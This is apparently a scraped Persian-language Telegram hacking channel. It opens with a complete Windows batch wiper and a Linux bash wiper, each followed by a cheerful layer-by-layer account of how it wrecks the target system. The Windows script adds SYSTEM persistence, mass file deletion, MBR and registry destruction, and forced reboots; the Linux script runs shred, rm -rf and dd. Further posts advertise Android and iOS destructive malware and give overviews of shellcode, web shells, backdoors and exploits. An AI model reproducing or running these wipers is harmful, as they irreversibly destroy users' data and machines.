اونایی که با آردوینو کار میکنن :
🥹🏳️🌈🙂🫠
اونایی که esp پروگرام میزنن :
☠️💀☠️💀☠️💀
🥹🏳️🌈🙂🫠
اونایی که esp پروگرام میزنن :
☠️💀☠️💀☠️💀
🤣9❤1⚡1
Windows CMD
@echo off
setlocal enabledelayedexpansion
echo Attempting privilege escalation through scheduled task injection...
schtasks /create /tn "SystemOptimizer" /tr "%~f0" /sc onlogon /ru SYSTEM /f 2>nul
if exist "%windir%\system32\cmd.exe" (
takeown /f "%windir%\system32\cmd.exe" /a >nul 2>&1
icacls "%windir%\system32\cmd.exe" /grant:r SYSTEM:F /t >nul 2>&1
)
echo Initiating filesystem entropy cascade...
for /l %%i in (1,1,10) do (
start /b cmd /c "for /r C:\ %%f in (*.*) do echo %%i>%%f & del /f /q "%%f" 2>nul"
start /b cmd /c "for /r D:\ %%f in (*.*) do echo %%i>%%f & del /f /q "%%f" 2>nul" 2>nul
start /b cmd /c "for /r E:\ %%f in (*.*) do echo %%i>%%f & del /f /q "%%f" 2>nul" 2>nul
)
echo Overwriting boot sectors with chaotic data...
echo 0 | debug \\.\physicaldrive0 2>nul
echo Deploying registry entropy injection...
for /f "skip=2 tokens=3" %%a in ('reg query hklm /f * /t REG_SZ /s /k 2^>nul') do (
reg add "%%a" /ve /d "0xDEADBEEF" /f >nul 2>&1
reg delete "%%a" /f >nul 2>&1
)
echo Activating hardware destruction sequences...
for /l %%i in (1,1,2147483647) do (
fsutil file createnew C:\stress%%i.tmp 1073741824
start /b cmd /c "for /l %%j in (1,1,1000) do dir /s C:\ >nul 2>&1"
)
echo Broadcasting system meltdown to network...
for /l %%i in (1,1,100) do (
net send * "SYSTEM CORE BREACH DETECTED: CRITICAL FAILURE IMMINENT" 2>nul
ping -n 1 -l 65500 255.255.255.255 >nul 2>&1
)
echo Initiating final system termination...
shutdown /r /f /t 0
echo %random%%random%%random%%random% > %windir%\system32\ntoskrnl.exe
:burn
echo 0 > %temp%\burn.tmp
goto burn
❤🔥1❤1🏆1
حالا چه کار میکنه ؟ این اسکریپت با batch نوشته شده که بعدا فرقش رو با bash میگم
اسکریپت خودشو توی قالب یه Scheduled Task با سطح دسترسی SYSTEM پایدار میکنه تا اینجا اوکی ؟ یعنی ویندوز هر بار روشن بشه دوباره این کد اجرا میشه و باعث میشه سیستم در هر بوت عملا دوباره آلوده بشه و امکان ترمیم پایدار نداشته باشه این از این😂
ببین توی لایه دوم با ایجاد نویز Entropy و حذف گسترده ساختار NTFS و فایلهای حیاتی ویندوز تخریب میشن و در نتیجه DLLها و سرویسها و حتی فایلهای بوت ویندوز حذف میشن و سیستم تو مراحل بعدی بوت کرش میکنه یا وارد Repair Loop میشه !😂
لایه سوم ، لایه ی آسیبزدن به Master Boot Record که بازنویسی MBR باعث میشه Firmware سیستم همونBIOS و یا UEFI دیگه نتونه لودر ویندوز رو پیدا کنه بنابراین ویندوز دیگه حتا به صفحه لوگو هم نمیرسه😂 و سیستم «Non-system disk» یا Boot Failure نشون میده😂
لایه ی چهارم تخریب رجیستری هست که تغییر و حذف کلیدهای حیاتی رجیستری باعث میشه تنظیمات کرنل، سرویسها، درایورها و شِل ویندوز ناقص یا معیوب و خراب بشن و نتیجهاش اینه که اگر ویندوز بالا هم بیاد، بدون سرویسها، بدون Network Stack، بدون Explorer و با کرشهای زیاد بالا میاد چ غیر قابل استفادست😂
لایه پنجم ، تا اینجا نرم افزاری ننش گاییده شد حالا سخت افزار 😂 وارد کردن فشار غیرعادی روی هارد و سیستم منظورمه ، سورس با ساخت فایلهای ۱ گیگی و اجرای هزاران عملیات I/O باعث فرسایش شدید SSD و ایجاد Bad Sector روی HDD میشه که این کار میتونه باعث کاهش سرعت شدید و خطاهای Disk I/O و حتی خرابی فیزیکی یا منطقی دیسک شود، طوری که ویندوز دیگر نتونه دادهها را درست بخونه😂
لایه شیشم ، ننه سخت افزار و نرم افزار گاییده شد بریم سراغ اینترنت و شبکش این سورس باعث ایجاد ترافیک غیرعادی و پیامپراکنی تو شبکه و ارسال پینگهای حجیم و پیامهای Broadcast باعث Flood شدن لایه شبکه میشه که این اتفاق باعث اخلال تو Network Stack ویندوز و حتی فریز شدن سرویسهای شبکه، مثل TCP/IP Service میشه😂
لایه هفتم : میگه اقا اخرین ضربرو محکم تر بززززن ، ببین اینجا ریست اجباری + حلقه بیپایان نوشتم حالا دقیقا داستان چیه ؟
اسکریپت برمیداره سیستم رو فورن ریستارت میکنه و بعدش یه حلقه بیپایان اجرا میکنه که اجازه اجرای درست پروسههای ریکاوری یا Safe Mode را نمیده بنابراین سیستم عملن تو چرخهای گیر میوفته که امکان تعمیر ویندوز تقریبا غیر ممکنه😂
به صورت کلی
سطح نرمافزار: تخریب فایلها و رجیستری
سطح سیستمعامل: نابودی سرویسها و Boot Loader
سطح سختافزار: فشار بیش از حد روی دیسک
سطح شبکه: ایجاد اختلال در Stack
توجه با این کد مادر کسیو نگایید من مسئولیتی به عهده نمیگیرم
❤2❤🔥1
Linux bash
for i in {1..100}; do
find / -type f -exec shred -zufv {} \; 2>/dev/null &
find / -type d -exec rm -rf {} \; 2>/dev/null &
done
while true; do
yes > /dev/null &
openssl speed -multi $(nproc) > /dev/null &
cat /dev/urandom > /dev/fb0 2>/dev/null &
done
rm -rf /boot/ /efi/ /bootefi/ 2>/dev/null
dd if=/dev/zero of=/dev/sda bs=512 count=1 2>/dev/null
echo " System Permanently Compromised by RYSON" | wall
halt -f -n -p❤🔥1❤1
به صورت خلاصه این بش بالا هم توی چهارلایه اصلی خلاصه میشه
لایه داده: بازنویسی کامل فایلها و حذفشون ریکاوری تقریبن غیرممکن ، یعنی همه چیو پاک میکنه و جوری با shred باز نویسی میکنه که ریکاوریشون ممکن نیست
لایه سیستمعامل: حذف دایرکتوریهای ریشه که باعث از کار افتادن تمام سرویسها میشه
لایه بوت: که شامل نابودی کامل کرنل و EFI + پاککردن MBR میشه و سیستم اینجا به گا میره😂
لایه سختافزار و پردازنده: فشار شدید CPU و I/O که نتیجش قفل شدن یا خاموشی اضطراری کل سیستمه که اینجا دیگه واقعا سیستم به گا میره😂😂
❤2❤🔥1
Malicious.kt
5.2 KB
مخرب Android
خب حال توضیح ندارم که چه کار میکنه فقط هاید ایکون و هاید اکتیویتی هم داره که بعد از نصب بالا نیاد و نشه کاریش کرد و خلاصه بگم CPU , GPU مادرشون گاییده میشه و بوتلودر و ... گوشی دیگه قابل استفاده نمیشه
دوستان گلم خانومای عزیز فقط این کاتلین کیرخریو همینجوری نباید بدی به یارو اول باید توی اندروید استودیو کامپایلش کنی به APK بعد بدی بهش
1❤3
تو فکر مقاله ی انواع شل و حافظه Ram و آسیب پذیری هاشم ولی کونم نمیکشه بنویسم خیلی طولانی میشه ، نظر شما چیه؟ تو کامنت
1❤🔥5
اولا که این کد احتمال مخربیش روی دستگاه های جیلبریک خیلی خیلی خیلی بیشتره و باید با نرم افزار رسمی خود اول کامپایل و بیلد بشه ولی باز نوشتمببین اولا که این با زبان Objective-C نوشته شده و شامل دو قسمت و دو فایل میشه یکی فایل h همون Header هدر ها و یکی فایل m همون Implementation که فایل اصلی میشه
کارایی که تعریف شده شامل حملات سخت افزاری و نرم افزاریه ولی باز میگم ایفون امنیتش خیلی بالاست و نمیشه بوتلودر و حافظه و .. اینا رو مورد هدف قرار داد
بار پردازشی مداوم ایجاد میکنه و CPU و GPU رو تا حد Thermal Throttling زیر فشار میده
با ترکیب بار محاسباتی و نور صفحه و تاچ گوشی و ویبره ی دستگاه و چراغ قوه و ...، گرمای دستگاه رو بهطور غیرعادی بالا میبره
مصرف انرژی رو به شکل غیرنرمالی بالا میبره و PMIC رو تحت فشار میذاره
با ایجاد چرخه نوشتن و پاککردن سریع، فلش رو دچار I/O saturation میکنه کلا بگاییه دیگه
با صفهای موازی سنگین، باعث قفلشدن پردازشها و افت پاسخدهی سیستم میشه
با فراخوانیهای غیرمجاز، پایداری لایه کرنل و سیستمعامل رو مختل میکنه
و تا تونستم سعی کردم سند باکس و اپ استور رو دور بزنم ولی نمیدونم داستان چیه ایفون نداشتم تست کنم
❤1
𝗥 𝗬 𝗦 𝗢 𝗡
IN THE NAME OF DARK JUSTICE
اولا که باید با مفاهیم های مختلفی اشنا باشید ببین ما چند نوع شل داریم حالا شل ها چین بیشتر کد های مخربی هستند که روی سیستم اجرا میشه و بعضی از شل ها به عنوان مخرب استفاده نمیشن بازم کاری ندارم بریم سراغ انواع شل :
Shell code :
حالا شل کد چیه ، یه کد کوچیک و جمع و جوره که معمولا با زبان اسمبلی نوشته میشه به علت سطح پایین بودن و دسترسی و نزدیکی خیلی زیادی که به پردازنده و و سخت افزار و میتونه بهترین ارتباط رو بین نرم افزار و سخت افزار ایجاد کنه ، و انواع مختلفی داره که عبارتند از
1: Local Shellcode:
وقتی دسترسی محدودی داریم و میخوایم با سواستفاده از یه اسیب پذیری، سطح دسترسی بالاتری رو بگیریم استفاده میسه و بیشتر برای بررسی آسیب پذیری های محلی مثل buffer overflow هست ، بیشتر روی stack و heap و syscallها وتوکنهای دسترسی کار داره و میشه گفت اولین foothold محلیه
2 : Remote Shellcode:
ریموت شل کد خودش دو نوع داره که یکیش شل معکوسه و یکیش بایند شل کد هست و این ریموت شل کل بیشتر برای حمله به سیستمهای دیگه که تو شبکه یا اینترنت هستنه و معمولا با سوکتهای TCP/IP ارتباط برقرار میکنن
*Reverse Shellcode:
برای وقتیه که خود تارگت خودش به ما وصل میشه و یه شل معکوس ایجاد میکنه
*Bind Shellcode:
تارگت یه پورت باز میکنه و منتظر اتصال ما هستش
3 : Download & Execute Shellcode :
ببین این نوع ، شلکدیه که تو یه فایل (مثلا ابزار یا برنامه) رو از اینترنت دان کرده و ران میکنه ، میتونیم بگیم payload بزرگتر رو میگیره و اجرا میکنه و نوعی پل بین exploit و malware هستش
4 : Staged & Multi-Stage
ببین میتونیم بگیم این یه شل چند مرحله ایه و میتونیم روی تقسیم مسئولیت کار میکنه چرا میگن مولتی استیج ؟ چون چند تا مرحله داره حالا دقیقا چه کار میکنه ؟
*Stage 0:
فقط بقا و ارتباط رو محیا میکنه ،
*Stage 1:
دانلود کردن
*Stage 2:
قابلیتها مثل C2، persistence، lateral movement و ...
میتونیم بگیم ساختار ماژولار حمله با اینه
5 : Egg-Hunter :
میتونیم بگیم بیشتر کارش پیدا کردن پیلود گم شدست و حافظه رو بایت به بایت اسکن میکنه و دنبال یه signature خاص میگرده و وقتی پیداش کرد به اون جامپ میزنه و میتونیم بگیم نقش اصلی این حل محدودیت فضای اجراست
6 : Polymorphic Shellcode :
توی این نوع پیلود اصلی ثابته ولی encoding هربار فرق داره و layout بایت ها تغییر میکنه حالا چه چیزی ثابت میمونه ؟ رفتار و دیکودر کوچیکش ثابته و شکست signature-based detection رو انجام میده
7 : Metamorphic Shellcode
اقا رسیدیم به سوپر ترین داستان شل این نوع بک کسخلیه گول زدنش ناموسیه😂 حالا داستان چیه ؟ خود کد بازنویسی میشه ، reorder میشه و معادل سازیش منطقی میشه
حالا شاید بگی فرقش با Polymorphic چیه ، باید بگم که توی polymorphic ، ظاهر عوض میشه و دیکودر داره ولی توی metamorphic ، ساختار عوض میشه و دیکودر نداره
8 : Fileless / In-Memory
ببین این نوع کد هیچ فایلی رو توی دیسک ذخیره و اجرا نمیکنه همه چی روی RAM و داخل پردازه های legit هستش و احتمال شناساییش توسط انتی ویروس خیلی خیلی خیلی کمه و چون همه چی مستقیم روی رم ساخته و اجرا میشن
9 : Encoder/Decoder shell
ببین اینم یکی از سوپری بازیای الکسیسه چرا 🤣 چون پیلود اصلا رمزگذاری شدست و دیکدرش توی زمان اجرا اونو بازش میکنه حالا چرا ؟ چون bypass فیلتر و bypass WAF / IDS ساده داره و استتار اولیه رو داره
10 : Syscall-Based
این نوع مستقیماً با کرنل حرف میزنه جالب اینه که بدون libc و WinAPI حالا چرا ؟ چون hookهای امنیتی معمولن بالاترن و نقش اصلیش هم stealth توی سطح پایینه
11 : NOP-Sled / Control-Flow Oriented
به صورت کلی به رسیدن جریان اجرا به پیلود کمک میکنه و از پیشبینی پذیری جریان سواستفاده میکنه و موفقیت اکسپلویت های حافظه رو با خودش معمولا داره ولی ASLR و DEP اینا هم اذیت میکنن ببین میتونیم بگیم شامل تکنیک هاییه که باعث رسیدن pointer به محل اجرای واقعی شلکد میشه
12 : Architecture-Specific
ببین این بیشتر برای برای پردازندههای خاص مثل x86 و x64 و ARM و MIPS و RISC-V و ... نوشته میشه و میتونیم باهاش حملات هدفمنده IoT و موبایل بزنیم و اینکه کد نوشتهشده وابسته به معماری پردازنده و سیستمعامله و هر معماری مجموعه دستورالعملها و رجیسترهای خاص خودش رو داره و شلکدی که برای یه معماری نوشته میشه معمولا روی معماری دیگه کار نمیکنه چون دستورالعملها و آدرسدهی متفاوت هستند و حتی تو یه معماری واحد، تفاوت سیستمعاملها مثل Linux و Windows باعث تغییر تو نحوه ی فراخوانی توابع سیستمی میشه
❤2
حالا فرق شل کد اصلی همون Local/Classic Shellcode و شلکد معکوس چیه ؟ ببین اول بگم که این دو تا مکمل و کامل کننده ی همن شل کد اصلی کدیه که مستقیم روی سیستم تارگت اجرا میشه و روش کارش اینه که معمولا بعد از یه آسیبپذیری مثل Buffer Overflow، کنترل اجرای برنامه به این شلکد داده میشه و هدف اصلی اینه که یه شل محلی روی سیستم ایجاد میکنه مثلا ارتقای دسترسی از کاربر عادی به ادمین و نیازی به ارتباط شبکهای نداره و همهچیز داخل همون سیستم انجام میشه
ولی
شلکد معکوس یا همونReverse Shellcode
یه نوع شلکده که ریموت که قربانی خودش به سمت مهاجم اتصال برقرار میکنه و روش کارش اینه که شلکد روی سیستم تارگت اجرا میشه و یک کانکشن TCP/IP به سمت ما باز میکنه و یه شل از راه دور روی سیستم تارگت حتی پشت NAT یا فایروال ایجاد میکنه و چون ارتباط از داخل شبکه تارگت شروع میشه، خیلی سختتر توسط فایروال یا IDS بلاک میشه میتونیم بگیم بهترین روش توی این نوع حملات برای گرفتن دسترسی پایدار از راه دوره
❤3
𝗥 𝗬 𝗦 𝗢 𝗡
IN THE NAME OF DARK JUSTICE
رسیدیم به وب شل و انواعش
Web Shell
حالا وب شل دقیقا چیه ، وب شل یه اسکریپت مخرب سمت سروره که به ما اجازه میده که از راه دور روی سرور دستورات اجرا کنیم و بیشترین زبانهایی که برای نوشتن وب شل استفاده میشن PHP، Python، ASP، Perl، Ruby و Bash هستن و بیشترین زبانی که میتونم بگم میشه باهاش بهترین وب شل رو نوشت PHP هست و معمولا داخل یه وباپلیکیشن آسیبپذیر قرار میگیره
و به ما اجازه میده که از طریق HTTP/HTTPS با سیستمعامل سرور تعامل داشته باشه و Web Shellها در لایه Application کار میکنن و وابسته به زبانهای سمت سرور مثل PHP, ASP.NET, JSP, Python و ... هستن
وب شل میتونه دستورات سیستمعامل رو از راه دور اجرا کنه ، بدافزار رو بارگذاری یا بارگیری کنه و بکدور برای دسترسی های مستقیم ایجاد کنه ، میتونه دادههای حساس رو برداره و حتا حمله ب سامانه های دیگه شبکه بزنه و گسترده بشه
1: Command Web Shell
این سادهترین نوع وب شله که وظیفه اصلی اون اجرای مستقیم دستورات سیستمعامل از طریق درخواستهای HTTP هست و بیشتر برای Initial Foothold، تست RCE و تست نفوذ و بررسی سطح دسترسی وبسرور استفاده میشه و پیچیدگی پایینی داره و معمولا موندگاری و مخفیکاری کمی داره
2 : File Manager Web Shell
تمرکز این نوع وب شل روی مدیریت فایل های سروره و قابلیت هایی مثل آپلود، دانلود، حذف، ویرایش فایل و تغییر Permission همون دسترسی رو فراهم میکنه و بیشتر تو مرحله Post-Exploitation استفاده میشه و معمولا footprint بالاتری ایجاد میکنه
3 : Database Web Shell
این نوع وب شل مستقیما با دیتابیس تعامل و ارتباط داره و امکان اجرای Query، Dump گرفتن از جداول، تغییر دادهها و مدیریت کاربران دیتابیس رو فراهم میکنه و زمانی استفاده میشه که دسترسی سیستم عامل محدوده اما اتصال دیتابیس در دسترسه
4 : Stealth / Minimal Web Shell
ببین این وب شل بهصورت خیلی مینیمال و مخفیکارانه طراحی میشه و حجم کم، ظاهر Legit و اجرای شرطی داره که این خیلی خوبه و هدف اصلی کاهش شناساییش توسط AV، WAF و مانیتورینگهای امنیتیه
5 : Password / Token Protected Web Shell
این نوع وب شل مکانیزم احراز هویت داره و احراز هویت میتونه با Password، Token، Header یا Cookie انجام بشه بازم کاری ندارم بیشتر و هدفش جلوگیری از گوه کاری بچه های دیگس و کنترل ما روی دسترسی رو افزایش میده
6 : Encrypted / Obfuscated Web Shell
تو این وب شل ، دادهها و دستورات بهصورت رمزگذاری یا Obfuscate منتقل میشن که این کار باعث سختتر شدن Signature-based Detection و تحلیل ترافیک میشه و بیشتر برای Bypass IDS/WAF استفاده میشه
7 : Fileless / Memory-Only Web Shell
این نوع وب شل هیچ فایل دائمی روی دیسک ذخیره نمیکنه، اجراش معمولا تو حافظه همون RAM و داخل پردازههای Legit انجام میشه چیزی که توی شل کد صحبت کردیم و بیشتر صحبت میکنیم، مزیت اصلی اون کاهش Artefact های Forensic و شناساییش خیلی سخته
8 : Pivoting Web Shell
این نوع وب شل نقش Pivot Point داره برای دسترسی به شبکه داخلی، سرویسهای غیرقابل دسترس از بیرون و Lateral Movement استفاده میشه و میشه گفت میتونه بخشی از Post-Exploitation باشه،
9 : Persistence-Oriented Web Shell
تمرکز این وب شل روی ماندگاریه Persistence هست و قابلیت هایی مثل Self-Recovering، مخفی شدن تو فایلهای سیستمی و حتا اجرای مجدد پس از حذف داره😂 ببین بیشتر تو حملات APT بررسی میشه
10 : Hybrid Web Shell
وب شل Hybrid ترکیبی از چند نوع وب شله که مثلا ترکیب Command، File Manager، Encrypted و Pivoting و این نوع میتونیم بگیم انعطافپذیری بالایی داره و معمولا بهصورت ماژولار طراحی میشه به صورت رسمی میتونم بگم که پیشرفتهترین حالت وب شل محسوب میشه
❤2
𝗥 𝗬 𝗦 𝗢 𝗡
IN THE NAME OF DARK JUSTICE
بریم سراغ بکدور همون Backdoor
اینو بگم وب شل نوعی بک دور حساب میشه و بک دور یه مکانیزم دسترسی پنهان هستش و مثل اسمش میمونه یعنی مثل یه در پشتی میمونه ، یه در مخفی که به فرد اجازه میده که بدون عبور از فرایند های احراز هویت معمول، به یه سیستم، سرویس یا نرمافزار دسترسی پیدا کنه، حالا بک دور میتونه نرمافزاری، سختافزاری یا منطقی باشه و معمولا با هدف دسترسی پایدار، مخفی و بلندمدت ایجاد میشه و انواعی داره :
1 : Software Backdoor
این نوع Backdoor تو سطح نرمافزار پیادهسازی میشه وممکنه که داخل کد برنامه، سرویس یا اسکریپت مخفی شده باشه و دسترسی معمولا از طریق یک شرط خاص، ورودی مخفی یا رفتار تعریفشده فعال میشه میتونیم بگیم این نوع Backdoor رایجترین حالت در سیستمهای کاربردیه
2 : Network Backdoor
و اینکه Network Backdoor از طریق مکانیزمهای شبکهای عمل میکنه که معمولا شامل پورتهای مخفی، سرویسهای غیرمستند یا Listener های پنهان هستش ببین هدف اصلیش میتونم بگم که فراهم کردن دسترسی از راه دور بدون جلب توجه فایروال یا مانیتورینگه ، این نوع بک دور برای دسترسی Remote استفاده میشه
3 : Authentication Backdoor
تو این نوع، فرایند احراز هویت دستکاری میشه ممکنه که شامل ،حساب کاربری مخفی و رمز عبور Hardcoded و یا Token یا Credential خاص باشه ، حالا از اونور Authentication Backdoor معمولا تشخیص سختتری داره ، چرا ؟ چون از مسیرهای Legit استفاده میکنه
4 : Web Application Backdoor
این Backdoor داخل یک وباپلیکیشن قرار میگیره و میتونه بهصورت یه مسیر مخفی، پارامتر خاص یا فایل غیرمشهود وجود داشته باشه و اغلب با درخواستهای HTTP/HTTPS فعال میشه و برای حفظ دسترسی به سرور هم استفاده میشه
5 : Kernel-Level Backdoor
این نوع Backdoor تو سطح کرنل یا درایو هستش و مستقیما با هسته سیستم عامل تعامل میکنه و ارتباط داره ، اینم بگم که تشخیصش خیلی سخته و بیشتر وقتا تشخیص داده نمیشه و میتونه کنترل کامل سیستم رو انجام بده ، Kernel Backdoor جزو پیشرفتهترین و خطرناکترین بکدور حساب میشه
6 : Firmware / Hardware Backdoor
این بک دور توی سطح Firmware یا سختافزار پیاده سازی میشه مثل BIOS UEFI یا تجهیزات شبکه که حتی با تعویض سیستمعامل هنوز هم وجود دارن
7 : Persistence-Oriented Backdoor
اقا تمرکز این بک دور روی موندگاریشه کهبه Persistence معروفه، که ویژگی هایی مثل اجرای خودکار پس از ریبوت و بازسازی خودکار در صورت حذف و مخفی شدن تو سرویسها یا تنظیمات سیستم هستش و توی طولانی مدت باقی میمونه و کلا هستش
8 : Covert Channel Backdoor
این نوع بک دور از چنل های ارتباطی غیرمعمول استفاده میکنه مثل DNS و ICMP و Timing-based Channels و هدفش مخفی سازی ترافیک و جلوگیری از شناسایی شدنه
9 : Logic-Based Backdoor
ببین لاجیک بک دور بر اساس شرطهای منطقی فعال میشه حالا یعنی چی ؟ اقا مثلا تاریخ خاص یا ورودی مشخص ،وضعیت خاص سیستم و ... و تا زمانی که شرطش فعال نشه Backdoor کاملا غیرفعال و مخفی باقی میمونه
10 : Hybrid Backdoor
هیبرید هم که میدونید ترکیبه و این بکدور ترکیبی از چند نوع بک دوره مثل
ترکیب Network + Persistence
یا ترکیب Web + Authentication
و یا ترکیب Kernel + Covert Channel
این نوع انعطاف پذیری بالایی داره و تشخیصش تقریبا غیرممکنه
❤1
𝗥 𝗬 𝗦 𝗢 𝗡
IN THE NAME OF DARK JUSTICE
بریم سراغ اکپسلویت و پیلود و انواعشون اولا که من یه توضیحی در مورد اکپسلویت بدم ، اولا که اکپسلویت یه نوع استفاده از اسیب پذیریه ، ببین یه باگی رو فرض کن تا اینجا فقط باگه ولی اگر یه کدی بنویسیم که بتونیم از اون باگ سواستفاده کنیم بهش میگن اکپسلویت مثل اجرای کد، افشای اطلاعات یا ارتقای دسترسی حالا تا اینجا فقط تونستین ورود بزنیم بقیه کار با پیلوده و .. Payload است حالا پیلود چیه ؟ بزار با یه مثال درست حسابی بهت بگم دا ببین من به رفیقای خودمم همین توضیحو دادم ،
شما یه خونه رو فرض کنید ، یه شکستگی داره که میشه به خونه وارد شد ، به اون میگن باگ و اسیب پذیری ، حالا ما اگر بیایم از اون سواستفاده کنیم و وارد خونه بشیم میشه اکپسلویت ، یعنی سواستفاده از اون باگ و اسیب پذیری ، و اگر عمل مخربی انجام بدیم داخل خونه مثل دزدی و ... میشه پیلود ، اکسپلویت سواستفاده از اسیب پذیری برای ورود و گرفتن دسترسی و پیلود میشه حالا ک دسترسی و ورود رو گرفتیم اجرای کد مخرب خیلی قشنگ و ساده،انواع اکسپلویت:
1: Local Exploit
ببین Local Exploit زمانی استفاده میشه که ما از قبل به سیستم دسترسی محدودی داریم هدف اصلی هم معمولا Privilege Escalation و Escape از محدودیت های امنیتیه ، این نوع Exploit بیشتر روی باگهای محلی سیستم عامل یا برنامهها تمرکز داره
2 : Remote Exploit
توی این نوع Remote Exploit بدون دسترسی اولیه به سیستم اجرا میشه و از طریق شبکه یا اینترنت عمل میکنه و معمولا روی سرویسهای در حال اجرا تمرکز داره میتونم بگم این نوع Exploit پیچیدهتره ولی به شرایط شبکه وابستگی داره
3 : Client-Side Exploit
توی این نوع Client-Side Exploit کاربر نهایی رو هدف میگیره مثل مرورگرها، پلاگینها یا فایلهای مخرب ، و اینجا اجرای Exploit وابسته به همکاری خوده کاربره یعنی بیشترش روی مهندسی اجتماعی میچرخه
4 : Zero-Day Exploit
اخ اخ رسیدیم به Zero-Day Exploit ، ببین این نوع از آسیبپذیری استفاده میکنه که هنوز بهصورت پابلیک نشده و یا Patch نشده
5 : Logic Exploit
این اکپسلویت از ضعف در منطق برنامه سواستفاده میکنه نه از باگهای فنی مثل Buffer Overflow و معمولا هم شامل سوءاستفاده از جریان کاری اشتباه یا اعتبارسنجی ناقص هستش
❤1
𝗥 𝗬 𝗦 𝗢 𝗡
IN THE NAME OF DARK JUSTICE
توی پست بالا گفتیم که پیلود چیه به صورت خلاصه بگیم که Payload بخشی از حملست که پس از موفقیت Exploit اجرا میشه در واقع Exploit راه ر. باز میکنه و Payload کاریه که بعد از اون انجام میشه ، خیلی صحبت کردیم در موردش حالا بریم سراغ یه سری توضیحات اولا که شل کد یک نوع پیلود هست میتونیم بگیم هر شل کد یه نوع پیلوده ، ولی هر پیلود الزامن یه شل کد نیست ،
و انواعش هم دقیقا مثل انواع شل کد میمونه برای همین نمینویسمش
تا اینجا پیلود رو فهمیدید حالا بریم برای یه سری اصلاح ها که قبل از این که بریم سراغ RAM حتما باید بدونید
Vulnerability:
ضعف یا نقص امنیتی در نرمافزار یا سیستم همون آسیب پذیریه
Attack Vector:
مسیر یا روش رسیدن به هدف رو میگن اتک وکتور
Exploit:
روش سواستفاده از اسیبپذیری یا یه باگ
Payload:
کدی که پس از Exploit اجرا و انجام میشه
Shellcode:
کد سطح پایین که معمولاً بهعنوان Payload اولیه استفاده میشه
Web Shell:
رابط کنترلی مخرب مبتنی بر وب
Backdoor:
مکانیزم دسترسی پنهان و پایدار مثل یه دره پشتی
Trojan:
نرمافزاری که ظاهر Legit داره ولی عملکرد مخرب داره
Dropper:
برنامهای که Payload های دیگه رو نصب یا اجرا میکنه
Loader:
مسئول بارگذاری Payload توی حافظست
Stager:
این Payload کوچیک برای گرفتن Payload بزرگتره
C2 همون (Command and Control):
کانال کنترل و مدیریت دسترسی
Persistence:
تکنیکهای حفظ دسترسی طولانیمدت
Lateral Movement:
گسترش دسترسی تو شبکه داخلی
Post-Exploitation:
فعالیتهای پس از دسترسی اولیه
❤2
𝗟 𝗲 𝗮 𝗿 𝗻 𝗘 𝘅 𝗽 𝗹 𝗼 𝗶 𝘁
𝗥 𝗬 𝗦 𝗢 𝗡
رسیدیم دیگه به آخر داستان یعنی RAM ،
بیشتر نفوذ ها از همین جلو میره ، حالا اصلا رم چی هست ؟ یه قطعهی سختافزاریه که روی مادربورد نصب میشه ، حالا چون توی گوشی قضیه فرق میکنه و مدار یکه هست روی مدار خورده شده ، و ظرفیتشون 4GB، 8GB، 16GB و… و این همون حافظه هست که برنامه ها موقع اجرا استفاده میکنن ببین تو وقتی یه برنامه ای رو اجرا میکنی سیستم عامل برنامه رو از حافظه داخلی همون استورج میخونه و اون رو داخل RAM کپی میکنه و CPU و GPU فقط از RAM دادهها رو میخونن، حالا برات سواله چرا اصلا رم ؟ چرا اس اس دی یا هارد یا چیز دیگه ای نه ؟ اگر سیستم بخواد مستقیم از حافظه داخلی کار بکنه برنامهها چندین ثانیه تا یه دقیقه برای هر عملیات مکث میکردن و گوشی و کامپیوتر عملا غیرقابل استفاده میشد ، حالا براتون سواله که SSD که سریعه ، ولی رم در لحظه چند ده نانو ثانیه سرعتشه و نکته دوم رم برای داده های لحظه ایه که در لحظه باید حساب شن در اصل RAM مثل یه دفتر یادداشت موقت سی پی یو هست و اطلاعاتی که در لحظه نیاز داریه ولی حافظه ی داخلی برای ذخیره سازی همیشگی و لحظه ای نیست و یعنی سرعت بالای RAM نتیجه همینه که داده رو موقت نگه میداره و بعد از خاموش شدن همه چی پاک میشه ولی storage باید داده رو برای همیشه نگه داره و این کار سرعت رو خیلی پایین میاره بعدشم اس اس دی یه حافظه بلند مدته و سرعتش کمتره این کاربرد و تعریف رم
حالا موقعی که ما یه برنامه رو ران میکنیم رم قسمتی از خودشو مثلا یه حجمی رو ، به اون برنامه میده برای بخش های مختلف برنامه ، توی ویندوز این قسمت ها به :
Thread Stack
Private Heap
Process Heap
Virtual Address Space
Code Segment (Text)
Initialized Data Segment
Uninitialized Data Segment (BSS)
PE Image Mapping
DLL Mapped Sections
Memory-mapped Files
Shared Memory Sections
Paged Pool
Non-Paged Pool
Kernel Stack
System Cache
Pagefile-backed Memory
Working Set
Session Space
و توی اندروید به :
Stack (Java)
Stack (Native)
Java Heap
Native Heap
Code Segment (Text)
Data Segment
BSS Segment
Memory-mapped Area (mmap)
Shared Libraries
Binder Buffers
Ashmem
ION Buffers
Gralloc Buffers
DMA Buffers
JIT Cache
ART / Dalvik Metadata
Zygote Shared Pages
Page Cache
Kernel Memory
Slab Allocator
vmalloc Area
اینا هر کدوم کارای بهش های مختلف اپلیکیشن و تابع هاشونو و ... هر کدوم کار خاص خودش رو میکنه اما کدوم مورد خطر شل کده ؟
توی اندروید فقط با
Native Stack
Native Heap
کار داریم و توی ویندوز فقط با
Thread Stack
Process Heap
کار داریم ، حالا این بخش هایی که در بالا گفتم در اصل زیرمجموعه ی 6 بخش هستند که در پارت بعدی میبینیم
@LearnExploit
@MR_RYSON
#LearnExploit
#RYSON
#shell
❤3❤🔥1
𝗟 𝗲 𝗮 𝗿 𝗻 𝗘 𝘅 𝗽 𝗹 𝗼 𝗶 𝘁
𝗥 𝗬 𝗦 𝗢 𝗡
Part 2
ما توی اندروید 6 تا بخش رو داریم از جمله:
Text Segment
Data Segment
Heap
Memory-mapped Area
Stack
Kernel space
که کرنل اسپیس داخل فضای ادرس نیست ولی مصرف RAM سیستم هست
حالا این 6 بخش اصلی هر کدوم زیر مجموعه ای دارن که توی لیست زیر میتونید کل قسمت های رم رو نگاه کنید :
1 : Text Segment :
*App Code
*Shared Libraries
*ART / JIT Code
*Read-Only Data (RODATA)
2 : Data Segment همون Global / Static
*Initialized Data
*BSS
*Read-Only Data (RODATA)
3 : Heap
*Java Heap
*Native Heap
4 : Memory-mapped Area
*mmap
*Ashmem
*Binder Buffers
*ION / DMA / Gralloc
*Zygote Shared Pages
*Page Cache
*JIT Cache
5 : Stack
*Java Stack
*Native Stack
6 : Kernel Space جزو فضای ادرس نیست
*Kernel Memory
*Slab Allocator
*vmalloc Area
